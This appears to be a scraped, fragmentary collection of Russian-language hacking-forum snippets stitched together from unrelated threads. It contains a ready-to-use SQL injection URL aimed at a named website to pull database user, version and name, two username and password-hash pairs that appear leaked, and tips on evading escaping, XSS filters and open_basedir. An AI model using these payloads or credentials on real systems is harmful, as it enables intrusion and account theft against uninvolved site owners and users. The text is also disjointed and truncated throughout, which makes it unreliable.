Separate names with a comma.
http://greenconsultancy.com/print_view.php?pageType=page&id=-1'+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9--+...
Seravin тогда уж mysql_real_escape_string() потому что addslashes() обходиться при мультибайтовых кодировках в бд, кроме UTF-8
необязательно спамить/инвайтить, сам наблюдал как менее известные личности паразитировали на звездах, сначала выдавая свои песни за их а после...
мож кто попробует вывести или еще что ?
http://wiki.linuxformat.ru/index.php/LXF90:Apache, для хека даст развечто логины пользователей для последующего брутфорса.
1)найти раскрытие в скрипте 2)попробывать найти логи, конфиги а в них пути (список путей к ним здесь ) 3)попробывать найти в кеше...
harry:2a9572ddc97c0a6034488c7f0b0f69ef marianne:7618b2dbd47cb181fcb4f73ba79de062
1/**/union/**/select/**/table_name/**/information_schema.tables/**/limit/**/1,1 Что то типа такого, можно ведь обойтись спокойно и без того что...
Похоже на htmlspecialchars() , его обойти можно только если твоя ксс будет в ссылке с кодировкой UTF-7 нипанятна, а где скуля ? А тут 4 ветка,...
а можно ли какнибудь обойти open_basedir при инклуде ? т.е. пытаюсь эксплуатировать багу а мне в ответ Warning: file_exists()...
DJON2005, там 2.0.13
можно еще 0x0a, 0x0c, 0x0b, 0x09 или любой символ неиспользуемый мускулом. если версия => 5 то смотри в schema_name из таблицы schemata UPD:...
есть только парсер мыл, скачать можно тут .
<?php $_FILE = file_get_contents($_FILE_PATH."/".$_FILE_NAME); $_FILE = preg_replace("!\<\?php(.*?)\?\>!si", "", $_FILE); $_S_=strrev(DECODE);...
действуй ;)
Ну так посмотри как там реализовано, там ничего сложного нету. Задаешь инфу для подключения => предварительно чистишь базу => создаешь нужные...
когда раньше пробывал там был запрет в роботс, сейчас дела поменялись ? ну раз уж хвастаешься то спали тему мне неумному ;) Это конечно хорошо...
В сети есть, найтмар помойму записывал... Масяня против Webkillа.
а тут и не получиться у тебя, ковычки фильтруются, но зато читалка файлов есть.
$text = ' align="left" width="78%"><b>thisworld</b></td><td style '; preg_match("#align=\"left\" width=\"78%\"><b>(.*?)</b></td><td...